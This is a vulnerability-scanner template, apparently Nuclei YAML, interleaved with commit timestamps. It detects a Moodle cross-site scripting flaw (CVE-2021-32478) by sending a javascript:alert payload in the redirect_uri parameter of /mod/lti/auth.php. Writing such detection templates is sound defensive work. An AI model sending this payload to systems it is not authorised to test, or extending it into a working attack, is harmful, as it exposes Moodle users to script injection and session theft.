2021-04-12 18:25:06 +00:00
id : moodle-xss
info :
2022-09-21 21:42:27 +00:00
name : Moodle - Cross-Site Scripting
2021-04-12 18:25:06 +00:00
author : hackergautam
severity : medium
2022-09-21 21:42:27 +00:00
description : Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, and earlier unsupported versions contain a cross-site scripting vulnerability via the redirect_uri parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://twitter.com/JacksonHHax/status/1391367064154042377
2022-09-21 21:42:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-32478
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2021-04-12 18:25:06 +00:00
tags : moodle,xss
requests :
- method : GET
path :
- "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')"
matchers-condition : and
matchers :
- type : word
part : body
words :
2021-04-13 20:45:17 +00:00
- '{{randstr}}'
- '<form action="javascript:alert'
condition : and
2021-04-12 18:25:06 +00:00
- type : status
status :
- 200
- type : word
part : header
words :
2021-07-06 06:27:15 +00:00
- "text/html"
2022-09-21 21:42:27 +00:00
# Enhanced by md on 2022/09/19